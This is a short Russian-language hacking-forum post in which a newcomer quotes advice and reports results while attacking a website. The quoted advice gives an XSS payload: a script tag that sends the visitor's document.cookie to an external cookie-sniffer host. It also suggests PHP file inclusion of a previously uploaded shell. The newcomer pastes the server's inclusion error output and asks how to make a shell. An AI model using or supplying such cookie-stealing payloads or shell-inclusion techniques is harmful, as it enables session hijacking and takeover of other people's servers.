20.02.2006, 00:10
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
Провел на форуме:
80773
Репутация:
0
|
|
Сообщение от Evolution
если выполняется произвольный код, значит есть уязвимость xss.
вмечто кода алерта подставляй ссылку на снифер.
бует примерно так: http:/www.site.com:443/interesting/index.php?pg=<script src="http://adressnifera"+document.cookie;></script>
и пхп инекция, пробуй вместо <Sсгiрt>аlегt()</Sсгiрt> поставить ссылку на предворительно залитый табой шел.
//может чё нить и получиться)
1) Сниффер молчит....
Вот ответ на заливку сниффера:
Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com:443/html/interesting/index.php on line 39
Warning: main(): Failed opening '../interesting/info/<script src=\"http://s.netsec.ru/xxx/pic.gif\" document.cookie;></script>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39
2) А как Шелл делать?
|
|
|